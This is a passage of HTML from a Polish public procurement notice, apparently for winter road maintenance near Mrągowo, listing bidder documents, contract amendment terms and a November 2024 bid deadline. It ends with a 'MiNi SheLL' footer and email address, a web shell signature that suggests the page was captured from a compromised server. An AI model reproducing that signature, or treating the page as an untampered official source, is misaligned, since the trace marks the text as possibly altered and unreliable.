złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">3)	Wykaz sprzętu / wykaz urządzeń technicznych ( wykaz sprzętu do zimowego utrzymania dróg ) dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie ich dysponowania(sporządzony wg załącznika <br/>w zależności od zadania)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów ( Dz. U. z 2021 r., poz. 275), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 6 do SWZ;<br/>	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiając pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia o których mowa w Rozdziale XV ust. 1 SWZ składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie <br/>z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia <br/>na warunkach określonych we Wzorze Umowy, stanowiącym Załącznik nr3 do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 3 do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem : https://platformazakupowa.pl/pn/pzd_mragowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-07 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com